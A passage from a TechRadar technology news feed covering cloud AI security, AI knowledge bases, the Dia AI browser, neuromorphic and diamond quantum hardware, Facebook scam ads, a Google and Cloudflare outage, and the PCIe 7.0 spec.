
TechRadar News


AI powered cloud creates AI powered risks

Fri, 06/13/2025 - 03:48

The IT infrastructure that underpins today’s businesses is unrecognizable from even a few months ago. Every organization, whether by plan or not, has migrated to the cloud with AI intertwined, given that each enhances the other's capabilities.

Cloud and AI are undeniable game changers for businesses; however, both introduce complex cyber risks when combined. Cloud security measures must evolve to meet the new challenges of AI and strike the delicate balance between protecting against complex attacks on AI data and enabling organizations to achieve responsible AI innovation.

The marriage of Cloud and AI

Cloud computing provides the infrastructure and resources needed to power AI algorithms, while AI makes cloud services more intelligent, efficient, and user centric. Underpinning this is the development team, running at full speed, creating and deploying new applications that reshape operations, enhance scalability and flexibility, and squeeze out cost savings where they can. But for those working to secure these shifting environments, it’s like trying to catch smoke. What is secure today may move, morph or even disappear entirely.

According to the Cloud AI Risk Report, cloud-based AI is prone to avoidable toxic combinations that leave sensitive AI data and models vulnerable to manipulation, data tampering and data leakage. As an illustration, this could leave AI training data susceptible to data poisoning, threatening to skew model results. Researchers calculated that almost 70% of cloud AI workloads contain at least one unremediated vulnerability.

More concerning was the discovery that three out of four organizations using one specific cloud provider for AI services had overprivileged default configurations. Dubbed the ‘Jenga-style’ concept, the research found a tendency for cloud providers to build one service on top of another, with “behind the scenes” building blocks inheriting risky defaults from one layer to the next, so that any single misconfigured service puts all the services built on top of it at risk. The result is that users are left largely unaware of the existence of these behind-the-scenes building blocks, as well as of any propagated risk.

Threat actors are circling

When we talk about AI usage in the cloud, more than sensitive data is on the line. If a threat actor manipulates the data or AI model, there can be catastrophic long-term consequences, such as compromised data integrity, compromised security of critical systems and degradation of customer trust. In addition, training and testing data is an attractive target for misuse and exploitation, as they may contain real information such as intellectual property, personal information (PI), personally identifiable information (PII) or customer data related to the nature of the AI project.

Threat actors are not just targeting AI but also harnessing it. Reports confirm that they have a number of powerful AI tools at their disposal, including AI-driven virtual assistants that can streamline and amplify their attacks. So far this year, there have been reports of threat actors harnessing AI to write malware for ransomware attacks. In fact, FunkSec, according to Check Point, is one such group believed to use AI-assisted malware development. The danger is that this could see inexperienced actors able to spin up and refine tools quickly to launch their own criminal escapades.

AI powered defenses

AI can be used to search for patterns, inspect what is happening within the organization's infrastructure, and explain the results in the simplest language possible. This can help the security team know what is important, which attack paths could be travelled should a threat actor gain access, and where best to prioritize efforts to shut off those paths and reduce cyber risk. Solutions such as data security posture management (DSPM) and AI security posture management (AI-SPM) are becoming integral to many organizations.

Gartner defines DSPM as “... visibility as to where sensitive data is, who has access to that data, how it has been used, and what the security posture of the data stored or application is.” Put simply, DSPM solutions discover, classify and remediate data risks in cloud environments.

AI security posture management (AI-SPM) is a cloud-native application protection platform (CNAPP) domain that gives security teams full visibility into and security of AI workloads, services and data used in training and inference, without deploying an agent. It identifies and prioritizes AI resources based on sensitivity, access and risk relationships, providing the context needed to isolate the most critical AI exposures.

In summary

Though standalone DSPM and AI-SPM services act as powerful spotlights to illuminate data and AI resources, if they’re not combined with broader cloud security measures, they can't prevent unauthorized access or breaches that exploit vulnerabilities in the cloud infrastructure.

While the combination of AI and cloud offers immeasurable benefits, it introduces risks that could jeopardize sensitive data and data integrity, ultimately diminishing customer trust and business bottom lines. Organizations need DSPM and AI-SPM to pinpoint their valuable data and AI resources and cloud security solutions to build a secure vault around them.


This article was produced as part of TechRadarPro's Expert Insights channel where we feature the best and brightest minds in the technology industry today. The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/news/submit-your-story-to-techradar-pro

Categories: Technology

Capcom confirms Monster Hunter Wilds' second major title update will launch at the end of June

Fri, 06/13/2025 - 03:26
  • Monster Hunter Wilds' second major title update is coming soon
  • It's scheduled to release at the end of June 2025
  • A new event quest is scheduled to arrive next week, too

Monster Hunter Wilds developer Capcom has now confirmed that the game's next major content patch - Free Title Update 2 - is set to arrive at the end of June.

While no specific release date has been given as of yet, the official Monster Hunter X / Twitter account made the announcement alongside a teaser image of one of the update's highly-anticipated returning monsters - Lagiacrus.

Aside from Lagiacrus - who debuted in Monster Hunter 3 and hasn't been seen since Monster Hunter Generations Ultimate - there are a few things we know are coming in Free Title Update 2 thanks to Capcom's Director's Letter.

Posted to the official Monster Hunter website, the letter (written by game director Yuya Tokuda) confirms the second major update will bring a new high-difficulty Arch-tempered monster. Some weapons are also set to receive improvements, such as the Hammer and Dual Blades.

Several quality of life updates are also on the way, including improved navigation in the Grand Hub, "improved Seikret usability", photo mode adjustments and - perhaps best of all - layered weapons.

That last one, similar to layered armor, will let you cast a different appearance onto your equipped weapons. That's going to be awesome for players running a particular build who don't like the way their weapon looks by default.

Additionally, Capcom has announced a new event quest will be arriving on June 17. Completion of the quest will earn you a Wudwud equipment set for your Palico companion, allowing you to dress them up as one of the adorable Scarlet Forest denizens.

Categories: Technology

Your AI is only as good as the knowledge base it ingested

Fri, 06/13/2025 - 01:28

Will your AI confidently deliver the right answers or stumble through outdated knowledge while your customers grow increasingly frustrated?

Artificial intelligence (AI) may be changing how businesses interact with customers, but there's a critical element that often gets overlooked: the knowledge that powers it. The quality of AI responses directly depends on the information it can access – a relationship that becomes increasingly important as more organizations deploy AI for customer service.

AI is really good at accessing unstructured and structured data and collating it into a well-packaged natural language response. Unlike a Google search, which comes back with multiple responses (whose ranking is largely driven by advertising or other sponsorship), AI looks at the body of knowledge that supports the question being asked.

So, when talking about knowledge-driven AI for customer experience, the idea is that AI isn't accessing the full scope of available information but rather a well-structured knowledge base. This means companies must carefully choose what information AI can leverage, especially when dealing with decades' worth of data.

For example, a customer asking how to make a payment might receive outdated instructions about writing a cheque if the knowledge base contains too much legacy content. By providing a well-structured database which is rich enough to give as many answers as possible but also limiting AI to that particular knowledge base, you can really focus on giving AI the right information to deliver the answers you want customers to receive.
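As a rough illustration of that scoping idea, here is a minimal sketch of an assistant that only ever sees recently reviewed articles matching the question. The names here (Article, searchKnowledgeBase, answerFromKnowledgeBase, callModel) are illustrative assumptions, not a specific vendor's API.

```typescript
// Minimal sketch: answer customer questions only from a curated knowledge base.
// All names are illustrative placeholders, not a real product API.

interface Article {
  id: string;
  title: string;
  body: string;
  lastReviewed: Date; // used to keep legacy content (e.g. cheque instructions) out
}

// Pretend retrieval step: keyword match over curated, recently reviewed articles only.
function searchKnowledgeBase(kb: Article[], question: string, maxAgeDays = 365): Article[] {
  const cutoff = Date.now() - maxAgeDays * 24 * 60 * 60 * 1000;
  const terms = question.toLowerCase().split(/\W+/).filter(Boolean);
  return kb
    .filter(a => a.lastReviewed.getTime() >= cutoff)
    .filter(a => terms.some(t => a.body.toLowerCase().includes(t)))
    .slice(0, 3); // keep the context narrow and specific
}

// The model only ever sees the retrieved articles, never "the full scope".
async function answerFromKnowledgeBase(
  kb: Article[],
  question: string,
  callModel: (prompt: string) => Promise<string>
): Promise<string> {
  const context = searchKnowledgeBase(kb, question);
  if (context.length === 0) {
    return "I don't have that information yet - let me connect you with an agent.";
  }
  const prompt =
    `Answer using ONLY the articles below. If they don't cover the question, say so.\n\n` +
    context.map(a => `## ${a.title}\n${a.body}`).join("\n\n") +
    `\n\nCustomer question: ${question}`;
  return callModel(prompt);
}
```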

The specificity advantage

When building AI knowledge bases, starting small and narrow before expanding works better than beginning with everything and trying to narrow down. Companies often make the mistake of giving AI access to their entire information universe.

This approach typically creates more problems than it solves. Contact centers especially struggle with AI accuracy when the knowledge base contains outdated information or when AI draws from too many different sources at once. This limitation becomes obvious when you consider AI-generated images. When AI attempts to create images of people, it often produces noticeable errors – too many fingers, oddly positioned hands, or unnatural facial features. AI conversations follow the same pattern.

They appear fine at first glance, but closer inspection reveals gaps in understanding, inappropriate tone, and mechanical empathy. The information provided might be technically correct but lacks the nuance and specificity that customers need. Just as with images, these conversation models improve over time, but the fundamental challenge remains – AI needs well-structured information to avoid these pitfalls.

Experiential learning over algorithms

Ultimately, AI delivers its most reliable performance when confined to specific knowledge and topics. Unlike human agents, AI performs best when it follows a script. This creates an interesting contrast with what we've learned in the BPO industry. Our experience shows that human agents excel when given freedom to go off-script and apply their natural problem-solving abilities.

The best human interactions happen when agents bring their full selves to the conversation. AI, however, functions more like a trainee who needs clear boundaries. You want to keep AI narrowly focused on approved scripts and content until it develops more sophistication. Human agents can provide answers beyond their formal training.

They navigate complex systems, find creative solutions and interpret customer needs in ways that aren't documented. These skills develop through experience and remain challenging for AI to replicate. Today's AI systems can't navigate through interfaces like humans can. They can't click through multiple screens, follow complex processes or interact with CRM systems the way human agents do. AI only knows what exists in its knowledge base.

This limitation highlights why incorporating the lived experience of human agents into AI knowledge bases delivers such dramatic improvements. AI also differs from humans in its approach to uncertainty. It never lacks confidence, even when wrong. AI will state incorrect information with complete certainty if its algorithms determine that's the optimal response.

Human agents learn differently. When customers express frustration or correct a mistake, human agents experience that uncomfortable "oh my gosh" moment that embeds the learning in their conversational memory. Even with limited information, humans adapt quickly. Most AI systems lack this emotional feedback loop, which raises an important question: how do we configure AI to incorporate negative feedback into its knowledge in a meaningful way?

Information architecture is an investment

Creating effective AI knowledge bases requires ongoing attention across several dimensions. The foundation must be structured, current content that accurately reflects your products and services. This isn't a one-time effort but a continuous commitment to maintenance and accuracy. Equally important is establishing appropriate boundaries – giving AI enough knowledge to be helpful while limiting its ability to access irrelevant or outdated information. Improvement must be continuous rather than occasional.

By monitoring where AI struggles and systematically addressing those gaps, organizations keep their systems relevant and effective. Integrating successful human agent interactions represents another critical factor. When you capture what works in human conversations and incorporate those patterns into your AI knowledge base, performance improves significantly. Finally, robust feedback mechanisms allow AI to learn from customer responses without being susceptible to manipulation, creating a system that improves over time.

AI technology will continue evolving, but its effectiveness will always depend on the quality of its knowledge foundation. Organizations that invest in properly structured, well-maintained knowledge systems will see better results from their AI implementations. The future isn't just about deploying more sophisticated AI technologies but building better knowledge ecosystems these technologies can leverage. Your AI is only as good as the knowledge base it's built upon, and getting that foundation right is essential for delivering the customer experience you actually want.


This article was produced as part of TechRadarPro's Expert Insights channel where we feature the best and brightest minds in the technology industry today. The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/news/submit-your-story-to-techradar-pro

Categories: Technology

AI comes to the URL with a new web browser that answers you back

Thu, 06/12/2025 - 21:45
  • The Browser Company has launched an AI-powered browser named Dia
  • Dia integrates a personalized AI assistant directly into the address bar
  • The AI lets you chat with tabs and will adapt to your style over time

The Browser Company has a new way to travel the web using AI. Best known for its Arc browser, the company has introduced a new browser called Dia, which was first teased at the end of last year. This release follows an announcement last month that active development on Arc was winding down and the company would place its full weight behind Dia.

Unlike traditional browsers that send users searching across tabs or toggling between tools to get things done, Dia places an AI assistant directly into the browser’s address bar.

The idea is that instead of opening ChatGPT in another tab or copying content into a separate tool to summarize or rewrite, you just type your question where you’d usually enter a URL. From there, the assistant can search the web, answer questions about the page you’re on, compare tabs, or even draft content in the tone of a specific site.

Dia is built on Chromium and resembles a standard browser at first glance, but the key differences are found in the way AI suffuses its structure. The AI is omnipresent and customizable, plus there is no need to log in to a separate service. You stay on the page, talk to the browser, and it responds.

In many ways, Dia's AI behaves similarly to most other AI chatbots. You can ask it to summarize an article you're reading, help write an email based on your calendar and browser activity, or generate code in your preferred programming language. You can also personalize how the assistant writes for you in terms of style.

One of the more distinctive features is the browser’s ability to take on the “voice” of a given webpage. If you’re reading a corporate blog or product page and want to generate a document in a similar tone, Dia can adapt its output to match the site’s style.

Dia AI

The features are designed to blend seamlessly with the browser and your other online activities. The AI not only sees your current tabs but also remembers previous interactions, allowing it to use context in its responses. The more you interact with it, the more personalized the AI is supposed to become.

Eventually, it will remember your writing preferences and know which tasks you ask for often and surface those options. Dia is currently in an invite-only beta for Mac, though you can sign up for a waiting list to gain access.

Dia is arriving as browsers race to incorporate AI, and many AI developers are working on browsers. Google Chrome is testing Gemini-powered overlays and sidebars, Opera has its Neon browser promising a full AI agent experience, and Perplexity has its new Comet browser with AI features.

For the many people understandably concerned about privacy when the AI is this clever, The Browser Company claims that Dia handles user context locally where possible and does not send browsing data to third-party providers unless required by the task.

Notably, Dia centers AI as the main way to engage with the browser. The experience is meant to be rooted in user prompts and direct interaction, not automation. It's also worth noting that Dia's arrival means The Browser Company no longer sees Arc as worth spending resources on, despite praise for its design and rethinking of tab management. Dia is less about reinventing browser layouts and more about making AI a core function.

With AI rapidly becoming embedded in everything you touch online, Dia represents a very direct approach to making generative AI central to going online rather than treating AI as a bolt-on feature. The Browser Company is betting that it can be the primary interface for how users browse the web.

Categories: Technology

A system inspired by the human brain has quietly been activated at a US nuclear lab, and it has no operating system or storage

Thu, 06/12/2025 - 16:48
  • SpiNNaker 2 supercomputer operates without disks or an operating system for unmatched speed
  • Sandia’s system uses 152 cores per chip to mimic the parallelism of the human brain
  • With 138,240 terabytes of DRAM, the SpiNNaker 2 relies entirely on memory speed

A new computing system modeled after the architecture of the human brain has been activated at Sandia National Laboratories in the US state of New Mexico.

Developed by Germany-based SpiNNcloud, the SpiNNaker 2 stands out not only for its neuromorphic design, but also for its radical absence of an operating system or internal storage.

Backed by the National Nuclear Security Administration’s Advanced Simulation and Computing program, the system marks a noteworthy development in the effort to use brain-inspired machines for national security applications.

SpiNNaker 2 differs from conventional supercomputers

Unlike conventional supercomputers that rely on GPUs and centralized disk storage, the SpiNNaker 2 architecture is designed to function more like the human brain, using event-driven computation and parallel processing.

Each SpiNNaker 2 chip carries 152 cores and specialized accelerators, with 48 chips per server board. One fully configured system contains up to 1,440 boards, 69,120 chips, and 138,240 terabytes of DRAM.

These figures point to a system that is not just large but built for a very different kind of performance, one that hinges on speed in DRAM rather than traditional disk-based I/O.
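As a quick back-of-the-envelope check (a sketch based only on the counts quoted above, not figures supplied by SpiNNcloud), the board, chip and core numbers multiply out like this:

```typescript
// Back-of-the-envelope check of the board, chip and core counts quoted above.
const boards = 1_440;
const chipsPerBoard = 48;
const coresPerChip = 152;

const totalChips = boards * chipsPerBoard;      // 69,120 chips
const totalCores = totalChips * coresPerChip;   // 10,506,240 cores in a fully configured system

console.log({ totalChips, totalCores });
```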

In this design, the system’s speed is attributed to data being retained entirely in SRAM and DRAM, a feature SpiNNcloud insists is crucial, stating, “the supercomputer is hooked into existing HPC systems and does not contain any OS or disks. The speed is generated by keeping data in the SRAM and DRAM.”

SpiNNcloud further claims that standard parallel Ethernet ports are “sufficient for loading/saving the data,” suggesting minimal need for the elaborate storage frameworks typically found in high-performance computing.

Still, the real implications remain speculative. The SpiNNaker 2 system simulates between 150 and 180 million neurons – impressive, yet modest compared to the human brain’s estimated 100 billion neurons.

The original SpiNNaker concept was developed by Steve Furber, a key figure in Arm’s history, and this latest iteration appears to be a commercial culmination of that idea.

Yet, the true performance and utility of the system in real-world, high-stakes applications remain to be demonstrated.

“The SpiNNaker 2’s efficiency gains make it particularly well-suited for the demanding computational needs of national security applications,” said Hector A. Gonzalez, co-founder and CEO of SpiNNcloud, emphasizing its potential use in “next-generation defense and beyond.”

Despite such statements, whether neuromorphic systems like SpiNNaker 2 can deliver on their promises outside specialized contexts remains an open question.

For now, Sandia’s activation of the system marks a quiet but potentially important step in the evolving intersection of neuroscience and supercomputing.

Via Blocks & Files

Categories: Technology

This German startup wants to build portable quantum computers using diamonds - and says its QPU will sit next to a GPU or a CPU one day

Thu, 06/12/2025 - 15:20
  • QPUs may run AI inference faster and cheaper than conventional hardware ever could
  • Hybrid nodes combining CPUs, Nvidia GPUs, and diamond QPUs could change how we build quantum software
  • From defense to finance, Quantum Brilliance is betting on diamond chips to drive adoption

Diamonds have emerged as a critical material in the development of quantum technologies due to their unique atomic properties, and Quantum Brilliance, a company based in Germany and Australia, has outlined an ambitious plan to develop portable quantum computers using diamond-based quantum processing units (QPUs).

These devices are being designed to operate at room temperature and may eventually be integrated alongside GPUs and high-end CPUs in servers or vehicles.

But while the company’s vision promises a future where quantum computing is as seamless as plugging in a GPU for AI inference, several technical and commercial hurdles remain.

Rethinking quantum computing with diamonds

Over the past decade, researchers have increasingly focused on engineering high-purity synthetic diamonds to minimize interference from impurities.

Notably, a 2022 collaboration between a Japanese jewelry firm and academic researchers led to a new method for producing ultra-pure 2-inch diamond wafers.

In 2023, Amazon joined the effort through its Center for Quantum Networking, partnering with De Beers’ Element Six to grow lab-made diamonds for use in quantum communication systems.

Now, Quantum Brilliance aims to utilize nitrogen vacancies in diamond to create qubits, offering a more compact and power-efficient alternative to cryogenic quantum systems.

“We do have a roadmap to fault tolerance, but we are not worrying about that at the moment,” said Andrew Dunn, COO of Quantum Brilliance.

“People think of millions of qubits, but that will be very expensive and power hungry. I think getting an understanding of having 100 qubits in a car cheaply and simply - the use cases are very different."

This signals a departure from the prevailing trend in quantum computing, which focuses on building systems with millions of qubits.

The company is instead targeting inexpensive and practical use cases, particularly in applications such as AI inference and sparse data processing.

Quantum Brilliance is already collaborating with research institutions like the Fraunhofer Institute for Applied Solid State Physics (IAF).

IAF is currently evaluating the company’s second-generation Quantum Development Kit, QB-QDK2.0, which integrates classical processors like Nvidia GPUs and CPUs with the QPU in a single box.

In parallel, Oak Ridge National Laboratory in the US has acquired three systems to study scalability and parallel processing for applications like molecular modeling.

“The reason they are buying three systems is that they want to investigate parallelisation of systems,” Dunn added.

Quantum Brilliance is also working closely with imec to integrate diamond processes into standard chip manufacturing.

Beyond computation, the company sees potential in quantum sensing, and the technology may also be repurposed for defense and industrial sensors.

Ultimately, the company wants quantum computing to become as ordinary as any other chip in a server.

“Personally, I want to make quantum really boring and invisible, just another chip doing its job,” said Dunn.

Via eeNewsEurope

Categories: Technology

This Android AirTags rival finally got the one big feature it's been missing

Thu, 06/12/2025 - 15:00
The Moto Tag finally supports ultra-wideband tracking
  • This brings the Android Find Hub tracker on par with Apple's AirTags
  • No word yet on when other Find Hub trackers will support UWB

Google’s Find Hub – previously Find My Device – has been a fairly proficient Android alternative to the always-useful Apple Find My service, with both the Android and iOS options helping you locate your missing tech. But until now, Google’s service has lacked a key feature: ultra-wideband finding.

Find Hub can help you locate your phone, headphones, compatible Bluetooth trackers, and even close friends and family, all from one app. If you’ve not used the service (admittedly, it can feel a little hidden behind Google’s better known Android apps) it’s a useful one-stop finding shop that you’ll want to add to your home screen.

However, it has lacked one of the core benefits of Apple's Find My service: ultra-wideband tracking.

This upgraded variant of Bluetooth tracking allows your phone to more accurately pinpoint the precise location of the tag. Rather than simply telling you that you're getting further from or closer to the missing tag, the app can give you much more precise directions and distances thanks to UWB. But until now, no Find Hub devices offered UWB as an option.


Now, finally, the Moto Tag does so thanks to a firmware update, as spotted by Android Police. Once installed via the Moto Tag app (currently rolling out through the Play Store), you can launch the Find Hub app, and the updated tracker will be discoverable via UWB.

You’ll also need a high-end smartphone. While some devices that are a few years old do support UWB, the feature is exclusive to premium models like the Google Pixel 6 Pro and the Samsung Galaxy S21 Plus and Ultra. The standard flagships, unfortunately, lack the feature for now.

Hopefully, as other UWB trackers arrive for Android, there will be more reason for budget-friendly devices to support it. For now, Moto’s Tag appears to be the only UWB device supported by Find Hub.

Beyond UWB, Google’s Find Hub is also set to gain support for tracking some devices using satellites “later this year” (via Google’s blog), making the service even more useful than it currently is. That would let the service not just catch up to Apple, but effectively take the lead.

Categories: Technology

No, those amazing deals on Facebook aren't real - it's a scam, and here's how to spot it

Thu, 06/12/2025 - 14:34
  • High-end and luxury products are being advertised with huge savings
  • 4,000+ fake domains impersonating big brands have been spotted
  • Victims are losing money without receiving their products

More than 4,000 fake domains impersonating popular brands have been spotted in a scheme pushing scam ads targeting Facebook users.

The campaign was uncovered by threat analysts at Silent Push, who are calling the trend "GhostVendors." Scam ads for the fake domains run primarily on Facebook Marketplace, exploiting loopholes in Meta's ad policy; because ads are removed from the Meta Ad Library once a campaign completes, tracking efforts are frustrated and the attackers can remain under cover.

Key to the fake ads are unrealistically low prices designed to lure victims into thinking they've found a bargain – for example, researchers spotted a Milwaukee Tool chest for $129.

Scam artists are luring shoppers via Facebook ads

The ads also instill a sense of urgency by using keywords like 'clearance', 'holiday sale' or 'excess inventory', applying pressure on buyers to act promptly.

Links in the ads lead to scam sites that mimic their genuine counterparts through domain generation algorithms (DGAs) and template cloning, with redirection also used to pull victims towards malicious sites.

Countless brands have been imitated across the more than 4,000 fake domains, including retailers (Amazon, Costco, Argos), footwear (Birkenstock, Crocs, Skechers) and gift sites (Bath & Body Works, Yankee Candle).

Given how many attacks there have been, the consequences vary. Many victims have had their payment information stolen with no goods delivered, or have experienced financial fraud. Moreover, the threat appears to be global in scale and is not restricted to a single country or region.

Silent Push says threat actors have demonstrated a deep understanding of Meta's ad systems, which have been criticized for not keeping a public archive of inactive scam ads and for not allowing holistic tracking without (prohibited) external scraping.

In the meantime, potential victims (which means virtually all online shoppers) are being advised to be wary of ads that appear too good to be true.

Users can also verify the authenticity of deals by visiting websites directly. It's also recommended that online purchases are made with credit cards that come with additional protection, with direct bank transfers totally inadvisable.

Categories: Technology

Can't access Spotify or a part of Google? Everything we know about this outage impacting major services

Thu, 06/12/2025 - 14:29

If you’ve been experiencing issues with a single part or various parts of Google’s massive operation, or with playing your favorite songs or podcasts on Spotify, you’re not alone.

For over an hour now, since around 2 PM ET, reported issues on outage tracker Down Detector have been spiking for Google, Google Cloud, and Spotify – to the extent that Google confirmed issues impacting its various services as of 3:01 PM ET.

Spotify normally comments on issues via the @SpotifyStatus account on X (formerly Twitter), but as of now, it’s remaining silent. Now, the TechRadar team uses various parts of Google – mainly G-Suite with Docs – and hasn’t encountered issues yet, but my Spotify has been experiencing some issues with extended load times.

Considering that two major services are reporting issues, this could signal a larger problem with a cloud provider like Cloudflare. Either way, we’re starting our live reporting to keep you up to date on the latest developments with the outages affecting Google and Spotify.

A quick look at Down Detector’s homepage as of 3:25 PM ET shows that an extensive range of services are experiencing issues – some leveling off or dropping – with Google, Google Cloud, and Spotify at the forefront, alongside Discord and Amazon Web Services (AWS).

Google and Google Cloud both began spiking in the 2 PM ET hour, reaching over 10,000 reports, while Spotify also started in that hour but is currently at over 44,000 reports.

Google is investigating the issue

Google's status page currently lists an active 'Service Disruption' as of 3:01PM ET that is impacting a number of services – the good news, though, is that teams at the company are investigating.

"We're investigating reports of an issue with Gmail, Google Calendar, Google Chat, Google Cloud Search, Google Docs, Google Drive, Google Meet, Google Tasks, and Google Voice. We will provide more information shortly.

Multiple Workspace products beginning on Thursday, at 2025-06-12 10:58 PDT may be experiencing service issues.

Our engineers are currently investigating the issue.

We apologize to all who are affected by the disruption."

It's impacting several services across the G-Suite lineup, including Gmail. Still, Google doesn't clarify whether a specific user set is experiencing the issue. As of now, I can access my personal and work Google accounts without a problem. However, individuals in the comments on Down Detector are reporting issues with Messages, Google Cloud, and Google Voice.

Spotify has still not issued a statement, although reported issues on Down Detector continue to grow, now standing at over 45,000 reports as of 3:22 PM ET. We have also reached out to the streaming giant to request a comment.

It does seem that a majority of these issues started shortly after the 2 PM ET hour and are now stretching to over an hour of disruptions.

At the same time that these issues with Google and Spotify began emerging, Cloudflare is dealing with its own problems, according to the company's status page.

The latest update from Cloudflare, as of 3:12 PM ET, notes that its services are starting to recover, but issues are still present.

"We are starting to see services recover. We still expect to see intermittent errors across the impacted services as systems handle retried and caches are filled."

Considering that Discord and Snapchat are also experiencing a spike in reports, these issues may well be related to the problems affecting Cloudflare.

Google's making progress, says everything but Meet is fixed


Google is making some progress, at least according to the latest update on its Workspace status page, posted at 3:30 PM ET.

It reads: "All product impacts except Google Meet have recovered.

Google engineers continue to work on full mitigation."

This is good news for folks in the Google ecosystem, as it appears everything but Google Meet is back up. And even reports for Google's calling platform are starting to drop on Down Detector, now sitting at 1,854 reports as of 3:31 PM ET.

Snapchat and Discord are both seeing spikes in reported issues


Alongside issues impacting Google, Google Cloud, and Spotify, reported issues with Snapchat and Discord are both elevated on Down Detector.

Reported issues with Discord are currently sitting at 6,683 as of 3:35PM ET, but did spike to over 10,000 at 2:20PM ET – the same hour in which Google and Spotify saw major increases.

Snapchat is currently on the rise, with over 6,693 reported issues with the platform. For what it's worth, I can open the app on my iPhone, but I'm unable to load stories or the main page.

Google gives the all clear on Workspace issues


The Google Workspace status page now effectively says we're all clear. In a post that went live at 3:53PM ET, Google says all the issues are resolved.

"The problem with Gmail, Google Calendar, Google Chat, Google Cloud Search, Google Docs, Google Drive, Google Meet, Google Tasks, and Google Voice has been resolved. We apologize for the inconvenience and thank you for your patience and continued support."

Reports on Down Detector have slowed for both Google and Spotify and have been on the decline, so it appears that most services are coming back or are already back. Again, this does line up with Cloudflare's reported issues, and those are starting to recover.

Cloudflare is having some critical issues


Cloudflare has posted a new update as of 3:57 PM ET on its own status page, detailing a bit more about what is going on and the potential impact here. You can see the statement in full below, but Cloudflare’s critical Workers KV service went offline due to a separate outage hitting a key third-party service.

Workers KV is essentially Cloudflare's globally distributed key-value store: a service that Workers and many other Cloudflare products rely on to store and retrieve small pieces of data across Cloudflare's vast network.
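For readers unfamiliar with the service, here is a minimal sketch of how a Worker typically reads and writes Workers KV. The MY_KV binding name, the key, and the request handling are placeholder assumptions for illustration, not part of Cloudflare's incident report.

```typescript
// Minimal Cloudflare Worker using a Workers KV namespace binding.
// "MY_KV" is a placeholder binding name configured in wrangler.toml;
// the KVNamespace type comes from @cloudflare/workers-types.

export interface Env {
  MY_KV: KVNamespace;
}

export default {
  async fetch(request: Request, env: Env): Promise<Response> {
    const url = new URL(request.url);
    const key = url.searchParams.get("key") ?? "greeting";

    if (request.method === "PUT") {
      // Store the request body under the key; reads elsewhere on the network
      // are eventually consistent.
      await env.MY_KV.put(key, await request.text());
      return new Response("stored\n");
    }

    // Read the value back (null if the key has never been written).
    const value = await env.MY_KV.get(key);
    return new Response(value ?? "not found\n", {
      status: value ? 200 : 404,
    });
  },
};
```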

Furthermore, Cloudflare acknowledges that it's aware of the significant impact this is causing and is working to resolve the issue as soon as possible with all hands on deck.

Cloudflare’s critical Workers KV service went offline due to an outage of a 3rd party service that is a key dependency. As a result, certain Cloudflare products that rely on KV service to store and disseminate information are unavailable including:

  • Access
  • WARP
  • Browser Isolation
  • Browser Rendering
  • Durable Objects (SQLite backed Durable Objects only)
  • Workers KV
  • Realtime
  • Workers AI
  • Stream
  • Parts of the Cloudflare dashboard
  • Turnstile
  • AI Gateway
  • AutoRAG

Cloudflare engineers are working to restore services immediately. We are aware of the deep impact this outage has caused and are working with all hands on deck to restore all services as quickly as possible.

Google Cloud is still having issues

While Google says the issues affecting Workspace have been resolved, the Google Cloud dashboard continues to display issues.

The dashboard still warns that "Multiple GCP products are experiencing Service issues" – in fact, over 39 products are affected across the globe, including API Gateway, Agent Assist, and AlloyDB for PostgreSQL. That's the latest update from Google Cloud as of 3:56PM ET; you can see the status page here.

Impacted services are starting to recover


Google, Google Cloud, Spotify, Snapchat, and Discord, among other services that saw an increase in reported issues on Down Detector, are all starting to show a decline, and that's a good thing.

It's been roughly two and a half hours since we started seeing a spike in the 2PM hour for services like Google and Spotify, with the latter seeing over 44,000 reported issues. While Spotify has yet to provide any comment, Google Workspace and Google Cloud have been updating status dashboards. The former states that things are back to normal, while the latter continues to show some impacted services.

Down Detector is looking a lot better now, though reported outages do remain for all these platforms.

Cloudflare is still working to bring all of its impacted services back online, with the last update on its dashboard at 3:57 PM ET. That concluded with, "We are aware of the deep impact this outage has caused and are working with all hands on deck to restore all services as quickly as possible."

Cloudflare says its services are 'recovering quickly' around the globe

In line with reported outages for impacted services dropping on Down Detector, Cloudflare says its services are 'recovering quickly' across the globe in an update on its status page as of 4:32PM ET. It's expecting a 'steady drop' in impact and 'further recovery' in the next few minutes.

That's good news and likely means that Google, Spotify, and other services will be back online for you soon, if not already.

"Cloudflare services are recovering quickly around the globe. WARP and Turnstile are operational, though a small residual impact remains and we’re working to eliminate it. The core KV service is restored, bringing dependent products back online. We expect further recovery over the next few minutes and a steady drop in impact."

Now, Cloudflare says it's back to fully operational in an update that was posted just before the top of the hour at 4:57PM ET.

It reads in full: "All Cloudflare services have been restored and are now fully operational. We are moving the incident to Monitoring while we watch platform metrics to confirm sustained stability."

It's an excellent update for those who have felt the impact of this outage, and hopefully, any issues you've experienced have been resolved. While many services were impacted today, alongside this Cloudflare outage, Down Detector is looking a lot better with declines.

Google Workspace's status page indicates that the incident is resolved, while Google Cloud's status page still displays an active incident worldwide.

Furthermore, although Spotify didn't confirm an issue, the brand's care account is responding to a few users, recommending a restart of the app if they're unable to use the service.

Categories: Technology

PCIe 7.0 has been announced, offering superfast speeds for the components inside your PC – but don’t get excited just yet

Thu, 06/12/2025 - 14:06
  • The spec for PCIe 7.0 has been announced
  • It’s a new standard for even faster – incredibly quick – connections with PCIe components in your PC
  • The standard is still in the earliest stages, though, and won’t be here for a long time (PCIe 6.0 hasn’t quite arrived yet, in fact)

PCIe (PCI Express) connectivity continues to forge ahead, and a new spec for a future generation of PCs has already been announced: PCIe 7.0.

VideoCardz reports that PCI-SIG, the organization that oversees the standard, has announced PCIe 7.0 and is boasting about just how fast it’ll be. (Spoiler alert: really, really fast).

But wait a minute – aren’t we still on PCIe 5.0 these days? Well, yes, that’s what a (cutting-edge) PC will support, and I’ll come back to exactly what’s going on with the development path of the PCI Express standard (and PCIe 6.0) momentarily.

PCIe 7.0 is currently a spec that has just been sketched out, and it’ll offer a data rate of 128GT/s, which is twice the speed of PCIe 6.0 (which itself doubled the transfer rate of PCIe 5.0).

With PCIe 7.0, you’ll get support for up to 16 PCIe lanes (in a single slot) and up to 512GB/s of bandwidth in total (in both directions). PCIe lanes are bi-directional (meaning data can be sent in either direction) lines of communication hooking up PCIe components – primarily the graphics card or SSDs (but also other miscellaneous boards) – to the motherboard.

Collectively, PCIe lanes facilitate all these key components working in your PC (read up more about this here).
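Those headline figures fit together with some rough arithmetic – a sketch that ignores FLIT encoding and protocol overhead, so treat the results as approximate ceilings:

```typescript
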